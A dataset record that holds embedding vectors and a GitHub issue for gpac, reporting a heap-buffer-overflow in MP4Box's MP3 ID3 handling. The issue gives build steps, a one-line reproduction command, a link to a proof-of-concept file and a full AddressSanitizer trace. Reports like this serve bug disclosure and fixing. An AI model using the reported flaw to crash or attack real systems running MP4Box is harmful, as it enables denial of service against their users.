-0.018782900646328926, 0.006210114806890488, -0.008133799768984318, 0.0073710232973098755, -0.0062622069381177425, -0.004721770994365215, -0.0067719644866883755, -0.0014083454152569175, -0.0003518537851050496, 0.0070956796407699585, -0.007932872511446476, -0.011170021258294582, 0.0016688056057319045, -0.02262282744050026, 0.01282208226621151, 0.0010083529632538557, -0.004989672917872667, 0.011899309232831001, -0.0392029769718647, 0.01726478897035122, -0.011661174707114697, 0.03253519907593727, 0.017904777079820633, -0.018381046131253242, -0.0028743641451001167, 0.01643131673336029, -0.005387804936617613, -0.0017999658593907952, 0.0136183463037014, 0.00040115517913363874, -0.005019439850002527, 0.013223935849964619, -0.002837155479937792, -0.024140937253832817, 0.02184888906776905, 0.002652972936630249, 0.021834004670381546, -0.00014929949247743934, -0.0037878351286053658, 0.018008960410952568, -0.00435340590775013, 0.013387653045356274, -0.003514352021738887, -0.01303045079112053, -0.013558812439441681, 0.007508695125579834, -0.026894373819231987, 0.021655403077602386, -0.005804541055113077, -0.035303518176078796, -0.007586833089590073, 0.03330913558602333, 0.002200888469815254, -0.002236236585304141, -0.0013999735238030553, 0.014578328467905521, -0.0030064545571804047, 0.009540284052491188, -0.008684486150741577, 0.014094616286456585, 0.014087175019085407, -0.006664059590548277, 0.006184068974107504, 0.0014613677049055696, -0.003821322927251458, 0.005265016574412584, 0.017160605639219284, -0.00026139040710404515, 0.0005637102294713259, 0.01628248207271099, -0.01215232815593481, 0.02990082837641239, 0.017339205369353294, 0.0033636572770774364, 0.008193332701921463, -0.011646291241049767, -0.017964310944080353, -0.0067719644866883755, 0.019943807274103165, -0.009041689336299896, 0.0041524795815348625, -0.009904928505420685, 0.003439934691414237, 0.018857317045331, 0.005015718750655651, -0.010924444533884525, -0.008200774900615215, -0.03342820331454277, -0.004223175812512636, 0.013514162041246891, 0.005164553411304951, 0.015969930216670036, -0.01393089909106493, 0.005343154538422823, 0.01366299670189619, 0.0169075857847929, -0.013052775524556637, 0.005324550438672304, 0.006678943056613207, 0.010515149682760239, 0.006236161105334759, -0.009644468314945698, -0.004107829183340073, -0.013819272629916668, 0.0043868934735655785, -0.02489999309182167, -0.01747315749526024, -0.016922470182180405, 0.009674235247075558, 0.002695762785151601, -0.001686479663476348, -0.010753284208476543, -0.002933897776529193, 0.003884577425196767, 0.031910091638565063, 0.007724504917860031, -0.0005920818075537682, -0.001746013411320746, 0.014332751743495464, -0.006630572024732828, -0.010619333945214748, -0.003655744716525078, -0.0047031668946146965, -0.015493660233914852, 0.0012027679476886988, 0.04030435159802437, -0.007501253392547369, -0.001292998786084354, 0.0102472472935915, -0.015523427166044712, -0.012293720617890358, 0.017711292952299118, -0.001316254143603146, -0.005112461280077696, 0.015865745022892952, 0.01141559798270464, -0.025599515065550804, -0.014615536667406559, 0.0010855607688426971, -0.020494494587183, -0.002861341228708625, -0.01616341434419155, -0.007240793202072382, 0.020702863112092018, 0.0031311034690588713, 0.035363052040338516, -0.024230238050222397, 0.0007064982200972736, 0.03375563770532608, -0.002652972936630249, -0.007512415759265423, -0.023932568728923798, 0.0011562571162357926, -0.009116106666624546, -0.015508543699979782, 0.02771296352148056, 0.0006083605694584548, 0.00866216141730547, -0.010864910669624805, 0.0057115196250379086, 0.01646108366549015, 0.008290075697004795, -0.008997038938105106, -0.0009990507969632745, -0.003581327386200428, -0.02454278990626335, 0.0027925053145736456, -0.0054659429006278515, 0.002236236585304141, 0.00554408086463809, 0.016952237114310265, 0.018276862800121307, 0.0022567014675587416, -0.019794974476099014, -0.021372618153691292, -0.0046324701979756355, -0.017071304842829704, -0.000959051598329097, -0.008520768955349922, -0.006184068974107504, -0.009800744242966175, 0.006585921626538038, -0.010917002335190773, 0.014355076476931572, 0.00646313326433301, -0.00022290274500846863, 0.003672488499432802, 0.014466702938079834, -0.010068646632134914, 0.004052016418427229, 0.0190061517059803, -0.003958994522690773, 0.019586605951189995, 0.009108664467930794, 0.003436214057728648, -0.012033260427415371, -0.04036388546228409, 0.014265775680541992, -0.00215437775477767, -0.01983962394297123, -0.0011999772395938635, -0.021804237738251686, -0.0350058488547802, 0.007497532293200493, 0.0121969785541296, -0.018961500376462936, 0.0043496848084032536, 0.010537474416196346, -0.002362745814025402, -0.01729455590248108, 0.0047887465916574, 0.02460232377052307, 0.0068128942511975765, 0.02330746501684189, -0.021834004670381546, 0.0021860050037503242, -0.0014539259718731046, 0.012018376961350441, 0.01634201593697071, -0.018901966512203217, 0.016475966200232506, 0.018023844808340073, 0.017904777079820633, 0.003060407005250454, -0.0021729820873588324, -0.023411650210618973, -0.0067570810206234455, -0.0033710990101099014, -0.010537474416196346, -0.000265808921540156, 0.005350596271455288, 0.011810008436441422, -0.0036278381012380123, 0.022220974788069725, -0.00430875550955534, -0.009294707328081131, -0.015731794759631157, 0.00569291552528739, -0.004092945717275143, -0.007043587509542704, 0.022191207855939865, -0.02280142903327942, -0.020673096179962158, 0.002690181601792574, -0.00682405661791563, 0.016475966200232506, -0.016624800860881805, 0.0016436898149549961, -0.004100387450307608, -0.015032272785902023, -0.005056648515164852, 0.012606272473931313, 0.004740375094115734, -0.02052426151931286, -0.02312886342406273, -0.0006739406962879002, 0.002742273500189185, 0.002898549661040306, 0.008967272005975246, -0.0028873870614916086, -0.018857317045331, -0.005287341773509979, -0.014489027671515942, -0.0021432151552289724, -0.0070882379077374935, 0.023634901270270348, 0.008669602684676647, -0.00438317283987999, -0.01363322976976633, 0.018321514129638672, 0.012569064274430275, -0.029186423867940903, -0.0005576638504862785, -0.010753284208476543, 0.01454111933708191, -0.0439954437315464, -0.018202446401119232, -0.0032445897813886404, 0.011170021258294582, 0.013179285451769829, 0.024885110557079315, 0.007281722500920296, -0.00012895104009658098, -0.0003727836301550269, -0.012695573270320892, 0.0065598757937550545, 0.006864986382424831, 0.0023739084135740995, 0.009116106666624546, 0.0049152555875480175, -0.0043794517405331135, -0.00421945471316576, 0.013402536511421204, 0.011839775368571281, 0.020926114171743393, -0.004792467225342989, -0.0017376415198668838, -0.009302149526774883, -0.0013125332770869136, 0.004312476608902216, -0.027162276208400726, 0.0013143937103450298, -0.006571038160473108, 0.01622294820845127, 0.007188701070845127, 0.014273217879235744, -0.023605134338140488, -0.0027143671177327633, -0.015955045819282532, 0.003588769119232893, -0.011460247449576855, 0.006091047544032335, 0.0071105631068348885, -0.0003444120811764151, -0.00694312434643507, -0.0010371896205469966, 0.030898019671440125, 0.010061204433441162, -0.01029189769178629, -0.010120738297700882, -0.009227732196450233, 0.016535500064492226, 0.005224086809903383, -0.002498557325452566, 0.004926418419927359, 0.0175029244273901, 0.005945933982729912, -0.010790493339300156, -0.00558873126283288, 0.0057338448241353035, 0.0027850635815411806, 0.01897638477385044, -0.028933405876159668, -0.009711443446576595, -0.007672412786632776, 0.007222188636660576, 0.0020725189242511988, 0.006094768177717924, -0.007140329573303461, -0.012703015469014645, 0.007218468002974987, -0.020330777391791344, -0.025480447337031364, 0.002042751992121339, 0.004252942744642496, 0.023024680092930794, -0.0073226517997682095, 0.015910396352410316, 0.019140101969242096, 0.009510517120361328, 0.012301161885261536, 0.006351507734507322, -0.0018297327915206552, 0.001879034098237753, -0.010023996233940125, -0.010716076008975506, 0.018872199580073357, -0.024795809760689735, -0.029439441859722137, -0.010440732352435589, -0.026165084913372993, -0.0037766725290566683, 0.0054659429006278515, 0.003745045280084014, 0.007043587509542704, 0.007776596583425999, -0.01747315749526024, 0.00954772625118494, -0.0021153087727725506, 0.03908390924334526, -0.00008389375580009073, 0.015969930216670036, -0.01891685090959072, 0.007467765361070633, 0.01646108366549015, 0.015627611428499222, 0.002496696775779128, 0.0013739274581894279, 0.014213684014976025, -0.01568714529275894, -0.02295026183128357, -0.0020855418406426907, -0.023992102593183517, -0.0016232250491157174, 0.01029189769178629, 0.005793378688395023, -0.01717548817396164, 0.0012083492474630475, 0.008237983100116253, 0.017398739233613014, -0.007910547778010368, -0.02161075361073017, 0.017101071774959564, -0.007021262310445309, -0.005864074919372797, -0.018038727343082428, -0.015702027827501297, -0.02052426151931286, -0.0002523208095226437, 0.009942136704921722, -0.004528286401182413, 0.00845379289239645, 0.015181107446551323, -0.0054808263666927814, 0.014116941951215267, 0.01020259689539671, -0.013432303443551064, -0.019854506477713585, -0.00210972735658288, 0.016743868589401245, -0.004613866098225117, 0.010351431556046009, -0.004226896446198225, 0.0017404321115463972, 0.01399043295532465, 0.01387136522680521, 0.023664668202400208, 0.035630952566862106, -0.005696636158972979, -0.012040701694786549, -0.005685473792254925, 0.02570369839668274, -0.006917078047990799, 0.010611891746520996, 0.0102472472935915, -0.00002720878728723619, 0.008974713273346424, -0.005331992171704769, 0.013231377117335796, -0.0046547953970730305, 0.020821930840611458, 0.01027701422572136, 0.0065301088616251945, 0.012390462681651115, 0.030927786603569984, 0.0044352649711072445, 0.025629281997680664, 0.009897487238049507, -0.013171843253076077, 0.00683894008398056, 0.005317108705639839, 0.011996051296591759, 0.0034101679921150208, 0.011981167830526829, -0.003999924287199974, -0.0013013706775382161, 0.005034323316067457, 0.011333738453686237, -0.0016092718578875065, 0.03164219111204147, 0.011512340046465397, -0.010887235403060913, -0.010396081954240799, 0.0136183463037014, 0.008610069751739502, 0.010842585004866123, -0.0054585011675953865, -0.008416584692895412, -0.021566102281212807, 0.0006553364219143987, 0.02860596962273121, -0.01294114999473095, 0.006344066001474857, -0.005291062407195568, 0.011631407774984837, 0.012799757532775402, -0.036136988550424576, 0.014288101345300674, 0.015761561691761017, -0.013558812439441681, 0.0025301845744252205, -0.005845470819622278, 0.0009009131463244557, 0.024066520854830742, -0.018366163596510887, -0.002885526744648814, -0.0028111094143241644, 0.011973726563155651, 0.00694312434643507, 0.027400411665439606, -0.0062845321372151375, -0.024111170321702957, -0.009019363671541214, 0.012442555278539658, 0.006265927571803331, 0.00962214358150959, -0.012628598138689995, 0.02202748879790306, -0.011914192698895931, 0.011780241504311562, -0.01607411354780197, 0.00861751101911068, -0.023560483008623123, -0.004312476608902216, 0.0024334422778338194, -0.0034027262590825558, -0.020241476595401764, 0.017815476283431053, 0.006451970897614956, -0.004837117623537779, -0.014779254794120789, -0.0025004176422953606, 0.019616372883319855, 0.014622978866100311, 0.00860262755304575, -0.0005734774749726057, 0.003240868914872408, 0.0021934467367827892, 0.03491654619574547, -0.020390311256051064, 0.020881464704871178, 0.018514998257160187, -0.01894661784172058, 0.024766042828559875, -0.0013423000928014517, -0.002852038946002722, -0.023530716076493263, -0.011832334101200104, 0.015731794759631157, -0.007851013913750648, 0.00432363897562027, 0.0028483180794864893, 0.004896651487797499, -0.004781304858624935, 0.01399043295532465, -0.004107829183340073, -0.013253701850771904, 0.007910547778010368, -0.0030287797562777996, 0.002630647737532854, -0.008758903481066227, -0.0004067364789079875, 0.01388624869287014, -0.026596704497933388, 0.013439745642244816, -0.010634217411279678, -0.004092945717275143, 0.002885526744648814, -0.0030492446385324, 0.03256496414542198, 0.012144885957241058, -0.00210972735658288, 0.01702665351331234, 0.010358873754739761, -0.003121801186352968, 0.0021580986212939024, -0.015449009835720062, 0.005477105267345905, -0.021372618153691292, -0.02848690189421177, -0.009376566857099533, -0.011065836995840073, -0.03345797210931778, -0.026418104767799377, 0.014049965888261795, -0.0054659429006278515, -0.02463209070265293, -0.008304959163069725, 0.0075979954563081264, -0.0012511390959843993, 0.0007385906646959484, -0.001241836929693818, 0.010663984343409538, 0.01131141372025013, -0.004025970119982958, 0.01027701422572136, 0.01622294820845127, 0.013521604239940643, 0.019437771290540695, 0.01218209508806467, -0.0038008582778275013, -0.0225930605083704, -0.013164401985704899, 0.018098261207342148, -0.0026213456876575947, -0.015731794759631157, 0.002050193725153804, -0.024438606575131416, 0.013819272629916668, -0.005008277017623186, 0.023381883278489113, 0.010909561067819595, 0.005856633186340332, -0.004290151409804821, 0.023902803659439087, -0.0024129776284098625, 0.016595033928751945, 0.0016176437493413687, -0.0002709250838961452, -0.0005209203809499741, 0.014236009679734707, 0.0010809097439050674, -0.018931733444333076, 0.006716151721775532, 0.054056648164987564, 0.0028706432785838842, -0.007657529320567846, 0.021982839331030846, -0.0012074189726263285, -0.0021153087727725506, 0.011467689648270607, -0.006626850925385952, 0.012539297342300415, 0.003412028308957815, 0.0172052551060915, -0.006526387762278318, 0.018276862800121307, -0.009570050984621048, -0.007999848574399948, -0.005886400118470192, -0.004483636002987623, -0.027489712461829185, -0.012055585160851479, -0.012650922872126102, 0.005395246669650078, 0.02217632345855236, 0.002742273500189185, 0.007717063184827566, 0.007400789763778448, 0.013551371172070503, -0.002386931562796235, -0.003702255431562662, -0.00782868918031454, -0.025539981201291084, 0.03863740712404251, -0.006600805092602968, 0.021953072398900986, -0.0017162465956062078, 0.014049965888261795, 0.02223585732281208, 0.005774774122983217, 0.015865745022892952, -0.0006437087431550026, -0.025391146540641785, 0.018232213333249092, 0.001679968205280602, -0.020955881103873253, -0.005518035031855106, 0.006094768177717924, 0.021476801484823227, 0.010068646632134914, 0.0023683272302150726, 0.004814792424440384, 0.010366315022110939, 0.007471486460417509, 0.005730123724788427, -0.002520882524549961, 0.011482573114335537, -0.022548409178853035, -0.017636874690651894, 0.0018315932247787714, 0.01295603346079588, -0.005849191453307867, 0.005447338800877333, -0.006998937111347914, -0.02999012917280197, -0.0013134634355083108, -0.0027292505837976933, -0.01717548817396164, 0.010299339890480042, -0.008208216167986393, 0.01360346283763647, -0.0022771661169826984, 0.006745918653905392, -0.011638849042356014, -0.009212848730385303, -0.02181912213563919, 0.005477105267345905, -0.02190842106938362, -0.015091806650161743, 0.01631224900484085, -0.018172679468989372, -0.01791965961456299, -0.007337535265833139, 0.0003269705339334905, 0.01102862786501646, 0.005841749720275402, 0.00009517261787550524, -0.015076923184096813, -0.0013943922240287066, -0.0013125332770869136, -0.017577340826392174, -0.02478092536330223, 0.02848690189421177, 0.015538309700787067, 0.013402536511421204, -0.018351279199123383, -0.010768167674541473, 0.0024055358953773975, -0.03137429058551788, 0.005681752692908049, -0.0024557674769312143, -0.006939403247088194, -0.008334726095199585, 0.0224442258477211, 0.010589567013084888, -0.01945265382528305, -0.007464044727385044, -0.0004225501324981451, 0.013179285451769829, 0.004543169867247343, 0.0037803933955729008, -0.020673096179962158, 0.015880629420280457, 0.014846229925751686, -0.0020092641934752464, 0.007147771306335926, 0.0043496848084032536, 0.005004556383937597, 0.023515833541750908, 0.000044330554374028, 0.00682405661791563, 0.01998845860362053, 0.006548712961375713, 0.005953375715762377, -0.003732022363692522, 0.016892703250050545, 0.006697547622025013, 0.008096590638160706, 0.004275267943739891, -0.020390311256051064, 0.015344825573265553, 0.0332198366522789, 0.010931885801255703, -0.020732630044221878, -0.014578328467905521, 0.0022492597345262766, 0.005927329417318106, -0.010768167674541473, 0.01894661784172058, -0.012613714672625065, 0.037000227719545364, 0.008171007968485355, 0.004130154382437468, -0.01023236382752657, 0.057866811752319336, -0.01364811323583126, -0.0037115574814379215, -0.03316030278801918, 0.020271243527531624, -0.007977522909641266, 0.0054733846336603165, -0.031344521790742874, -0.0065673175267875195, 0.014667629264295101, 0.007545903325080872, 0.023724202066659927, 0.004505961202085018, -0.010351431556046009, 0.014310426078736782, 0.006076164077967405, 0.01675875298678875, -0.004178525414317846, -0.0010046320967376232, 0.01972055621445179, 0.0006260346272028983, 0.0021227505058050156, 0.01637178286910057, -0.011735591106116772, 0.017398739233613014, 0.008401701226830482, 0.004840838257223368, 0.02312886342406273, 0.009890045039355755, -0.018991267308592796, -0.021744703873991966, -0.02717715874314308, -0.010887235403060913, 0.015374592505395412, 0.008431468158960342, 0.0003420865396037698, -0.00857286062091589, 0.01995869167149067, 0.02845713496208191, -0.001546017243526876, 0.013908573426306248, -0.023739084601402283, 0.009994229301810265, 0.015233200043439865, -0.014295542612671852, -0.007865897379815578, -0.019824741408228874, 0.011125370860099792, -0.009041689336299896, 0.0036650467664003372, -0.011824891902506351, -0.00569291552528739, -0.010358873754739761, -0.014407169073820114, 0.02848690189421177, -0.0023887918796390295, 0.013313235715031624, 0.03848857432603836, -0.007344976998865604, 0.021566102281212807, -0.02321816422045231, -0.0023962336126714945, 0.008840763010084629 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
[POC](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) ``` Description Heap-buffer-overflow in MP4Box. Version MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D Reproduce complie and run ./configure --enable-sanitizer make Proof of Concept ./MP4Box -info ./poc.mp3 [poc](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) is here! ASAN information reported by sanitizer ==32961==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001bb8 at pc 0x7fe8c604bcc3 bp 0x7ffc04e06160 sp 0x7ffc04e06150 WRITE of size 1 at 0x602000001bb8 thread T0 #0 0x7fe8c604bcc2 in id3dmx_flush filters/reframe_mp3.c:274 #1 0x7fe8c604de18 in mp3_dmx_flush_id3 filters/reframe_mp3.c:344 #2 0x7fe8c604de18 in mp3_dmx_check_pid filters/reframe_mp3.c:417 #3 0x7fe8c604de18 in mp3_dmx_process filters/reframe_mp3.c:657 #4 0x7fe8c5bee15e in gf_filter_process_task filter_core/filter.c:2901 #5 0x7fe8c5badd1a in gf_fs_thread_proc filter_core/filter_session.c:1962 #6 0x7fe8c5bbb686 in gf_fs_run filter_core/filter_session.c:2264 #7 0x7fe8c55ea3c6 in gf_media_import media_tools/media_import.c:1239 #8 0x55a1aa648da1 in convert_file_info /home/functionmain/Desktop/gpac-master/applications/mp4box/fileimport.c:130 #9 0x55a1aa6123a7 in mp4box_main /home/functionmain/Desktop/gpac-master/applications/mp4box/mp4box.c:6371 #10 0x7fe8c2814082 in __libc_start_main ../csu/libc-start.c:308 #11 0x55a1aa5eaebd in _start (/home/functionmain/Desktop/gpac-master/bin/gcc/MP4Box+0xa4ebd) 0x602000001bb8 is located 0 bytes to the right of 8-byte region [0x602000001bb0,0x602000001bb8) allocated by thread T0 here: #0 0x7fe8c87e2c3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163 #1 0x7fe8c604b37a in id3dmx_flush filters/reframe_mp3.c:269 #2 0x7fe8c604de18 in mp3_dmx_flush_id3 filters/reframe_mp3.c:344 #3 0x7fe8c604de18 in mp3_dmx_check_pid filters/reframe_mp3.c:417 #4 0x7fe8c604de18 in mp3_dmx_process filters/reframe_mp3.c:657 #5 0x7fe8c5bee15e in gf_filter_process_task filter_core/filter.c:2901 #6 0x7fe8c5badd1a in gf_fs_thread_proc filter_core/filter_session.c:1962 #7 0x7fe8c5bbb686 in gf_fs_run filter_core/filter_session.c:2264 #8 0x7fe8c55ea3c6 in gf_media_import media_tools/media_import.c:1239 #9 0x55a1aa648da1 in convert_file_info /home/functionmain/Desktop/gpac-master/applications/mp4box/fileimport.c:130 #10 0x55a1aa6123a7 in mp4box_main /home/functionmain/Desktop/gpac-master/applications/mp4box/mp4box.c:6371 #11 0x7fe8c2814082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow filters/reframe_mp3.c:274 in id3dmx_flush Shadow bytes around the buggy address: 0x0c047fff8320: fa fa fd fd fa fa 06 fa fa fa 00 01 fa fa 00 00 0x0c047fff8330: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8340: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8350: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8360: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa fd fa =>0x0c047fff8370: fa fa 06 fa fa fa 00[fa]fa fa 05 fa fa fa 03 fa 0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==32961==ABORTING Impact This is capable of causing crashes. References [poc](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) Impact This is capable of causing crashes. Occurrences reframe_mp3.c L274 This vulnerability is capable of making the MP4Box crash .Additionally, the attacker could use this vulnerability to cause a denial of service (DoS) by crashing the application or making it unresponsive. This vulnerability poses a significant risk to the confidentiality, integrity, and availability of systems running the affected software. ```
heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c
https://api.github.com/repos/gpac/gpac/issues/2493/comments
0
2023-06-14T09:39:20
2023-06-15T09:28:16Z
https://github.com/gpac/gpac/issues/2493
1,756,476,073
2,493
false
This is a GitHub Issue repo:gpac owner:gpac Title : heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c Issue date: --- start body --- [POC](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) ``` Description Heap-buffer-overflow in MP4Box. Version MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D Reproduce complie and run ./configure --enable-sanitizer make Proof of Concept ./MP4Box -info ./poc.mp3 [poc](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) is here! ASAN information reported by sanitizer ==32961==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001bb8 at pc 0x7fe8c604bcc3 bp 0x7ffc04e06160 sp 0x7ffc04e06150 WRITE of size 1 at 0x602000001bb8 thread T0 #0 0x7fe8c604bcc2 in id3dmx_flush filters/reframe_mp3.c:274 #1 0x7fe8c604de18 in mp3_dmx_flush_id3 filters/reframe_mp3.c:344 #2 0x7fe8c604de18 in mp3_dmx_check_pid filters/reframe_mp3.c:417 #3 0x7fe8c604de18 in mp3_dmx_process filters/reframe_mp3.c:657 #4 0x7fe8c5bee15e in gf_filter_process_task filter_core/filter.c:2901 #5 0x7fe8c5badd1a in gf_fs_thread_proc filter_core/filter_session.c:1962 #6 0x7fe8c5bbb686 in gf_fs_run filter_core/filter_session.c:2264 #7 0x7fe8c55ea3c6 in gf_media_import media_tools/media_import.c:1239 #8 0x55a1aa648da1 in convert_file_info /home/functionmain/Desktop/gpac-master/applications/mp4box/fileimport.c:130 #9 0x55a1aa6123a7 in mp4box_main /home/functionmain/Desktop/gpac-master/applications/mp4box/mp4box.c:6371 #10 0x7fe8c2814082 in __libc_start_main ../csu/libc-start.c:308 #11 0x55a1aa5eaebd in _start (/home/functionmain/Desktop/gpac-master/bin/gcc/MP4Box+0xa4ebd) 0x602000001bb8 is located 0 bytes to the right of 8-byte region [0x602000001bb0,0x602000001bb8) allocated by thread T0 here: #0 0x7fe8c87e2c3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163 #1 0x7fe8c604b37a in id3dmx_flush filters/reframe_mp3.c:269 #2 0x7fe8c604de18 in mp3_dmx_flush_id3 filters/reframe_mp3.c:344 #3 0x7fe8c604de18 in mp3_dmx_check_pid filters/reframe_mp3.c:417 #4 0x7fe8c604de18 in mp3_dmx_process filters/reframe_mp3.c:657 #5 0x7fe8c5bee15e in gf_filter_process_task filter_core/filter.c:2901 #6 0x7fe8c5badd1a in gf_fs_thread_proc filter_core/filter_session.c:1962 #7 0x7fe8c5bbb686 in gf_fs_run filter_core/filter_session.c:2264 #8 0x7fe8c55ea3c6 in gf_media_import media_tools/media_import.c:1239 #9 0x55a1aa648da1 in convert_file_info /home/functionmain/Desktop/gpac-master/applications/mp4box/fileimport.c:130 #10 0x55a1aa6123a7 in mp4box_main /home/functionmain/Desktop/gpac-master/applications/mp4box/mp4box.c:6371 #11 0x7fe8c2814082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow filters/reframe_mp3.c:274 in id3dmx_flush Shadow bytes around the buggy address: 0x0c047fff8320: fa fa fd fd fa fa 06 fa fa fa 00 01 fa fa 00 00 0x0c047fff8330: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8340: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8350: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8360: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa fd fa =>0x0c047fff8370: fa fa 06 fa fa fa 00[fa]fa fa 05 fa fa fa 03 fa 0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==32961==ABORTING Impact This is capable of causing crashes. References [poc](https://gitee.com/FUNctionMain/mypoc/raw/master/poc) Impact This is capable of causing crashes. Occurrences reframe_mp3.c L274 This vulnerability is capable of making the MP4Box crash .Additionally, the attacker could use this vulnerability to cause a denial of service (DoS) by crashing the application or making it unresponsive. This vulnerability poses a significant risk to the confidentiality, integrity, and availability of systems running the affected software. ``` --- end body ---
5,379
[ -0.04023834317922592, 0.021250426769256592, -0.01255837269127369, 0.013066721148788929, 0.0421285405755043, 0.01227197889238596, -0.04599485918879509, 0.03373720124363899, -0.0048293168656528, 0.026262320578098297, -0.02152250148355961, 0.03356536477804184, 0.019532063975930214, 0.004886595997959375, 0.0039056967943906784, 0.012894885614514351, -0.011240960098803043, 0.02013349160552025, -0.025632252916693687, -0.004292328376322985, 0.022066649049520493, -0.0450497604906559, -0.02813819982111454, 0.050949472934007645, -0.02346997894346714, 0.014026140794157982, -0.013009442947804928, 0.016997477039694786, -0.017011797055602074, 0.030901901423931122, 0.022668076679110527, 0.03193292021751404, -0.025345860049128532, 0.026233680546283722, 0.00017675873823463917, 0.007446241099387407, 0.049689341336488724, 0.0837988555431366, 0.0076753562316298485, -0.024701474234461784, -0.01653924770653248, -0.03817630559206009, -0.03760351985692978, 0.018959276378154755, -0.0017317880410701036, 0.027665650472044945, 0.01494976133108139, -0.019259989261627197, -0.05034804716706276, 0.0012037493288516998, 0.023770693689584732, -0.017699142917990685, -0.0480855368077755, -0.049803897738456726, 0.003798299003392458, -0.0077254753559827805, 0.04218582063913345, 0.012164580635726452, -0.0016861440381035209, -0.004124071914702654, -0.01240085531026125, -0.010517816059291363, 0.015078638680279255, 0.0031055838335305452, -0.015307753346860409, -0.012773167341947556, -0.018157372251152992, 0.005570361390709877, -0.016768362373113632, 0.03937916085124016, -0.020849475637078285, -0.017398430034518242, 0.003071574494242668, 0.030644146725535393, 0.022496240213513374, -0.010968886315822601, 0.024014128372073174, 0.013138320297002792, -0.017197953537106514, 0.04023834317922592, -0.040725212544202805, 0.03330761194229126, -0.029197856783866882, 0.04736955091357231, 0.004310227930545807, -0.004532183520495892, -0.050004374235868454, -0.06976555287837982, -0.021422263234853745, -0.03748895972967148, 0.02137930504977703, -0.004417625721544027, 0.0018740900559350848, 0.018816078081727028, 0.0017299981554970145, -0.019345907494425774, -0.02808092162013054, -0.005670599173754454, -0.06690161675214767, 0.0029230075888335705, -0.03912140801548958, -0.034166790544986725, -0.010603734292089939, 0.03164652734994888, 0.018944956362247467, 0.012314937077462673, 0.01641036942601204, -0.03339352831244469, 0.004292328376322985, 0.15133053064346313, 0.021422263234853745, -0.002810240024700761, -0.0010328079806640744, 0.04347459226846695, 0.020520122721791267, 0.010868648067116737, 0.00033584158518351614, -0.022496240213513374, -0.031188296154141426, -0.017484348267316818, -0.00013167406723368913, -0.0357133187353611, -0.01759890466928482, 0.008319742977619171, -0.01702611707150936, 0.033851757645606995, 0.000854706799145788, -0.013646668754518032, -0.03640066459774971, -0.00342240696772933, -0.04301636293530464, -0.0017282081535086036, 0.011198000982403755, -0.018816078081727028, 0.0042994883842766285, 